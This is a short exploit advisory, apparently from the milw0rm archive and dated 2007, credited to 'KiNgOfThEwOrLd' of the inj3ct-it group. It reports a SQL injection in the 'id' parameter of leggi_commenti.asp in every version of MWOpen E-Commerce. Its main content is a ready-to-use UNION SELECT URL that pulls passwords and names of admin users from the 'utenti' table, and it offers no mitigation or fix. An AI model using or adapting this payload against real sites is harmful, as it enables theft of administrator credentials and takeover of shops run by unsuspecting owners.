--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- MWOpen E-Commerce All Versions "leggi_commenti.asp" SQL Injection --------------------------------------------------------------- #By KiNgOfThEwOrLd --------------------------------------------------------------- PoC: Nothing to say.. Corrupted Page: leggi_commenti.asp Corrupted Variabile: ?id= Exploit: http://[target]/[mwopen_path]/leggi_commenti.asp?id=9999+union+select+null, null,password,nome,null,data,null+from+utenti+where+Admin=true --------------------------------------------------------------- # milw0rm.com [2007-12-06]